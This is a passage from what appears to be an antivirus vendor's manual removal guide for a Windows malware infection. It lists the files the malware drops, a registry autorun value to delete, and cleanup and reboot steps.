    %Program Files%\Common Files\Install\fhrlsli\oemfhsli.exe (17882 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\lb[1].png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\iau[1].htm (1 bytes)
    %Program Files%\xxss.ini (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\core[1].php (800 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\z_stat[1].php (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\ad_sport[1].jpg (12251 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\addetail[1].html (308 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\ad[1].htm (519 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
    %Program Files%\TogouInputin\Togoupplib.dat (2095 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\jquery-1.9.1.min[1].js (55677 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\type[1].js (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\event[1].css (554 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (203 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\addetail[1].htm (413 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\center-titlebg[1].png (948 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\event[1].htm (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\common[1].js (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (214 bytes)
    C:\fhsli_6_12001.exe (1616 bytes)
    C:\114gglm_016.exe (1664 bytes)
    C:\xxdd_165.exe (30622 bytes)
    %Documents and Settings%\All Users\Documents\fhrl_6_12001.exe (13084 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (997 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (38 bytes)
    %Program Files%\fhrl\info.db (120 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "wjime" = "%Program Files%\Wuji\Wuji.exe auto"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
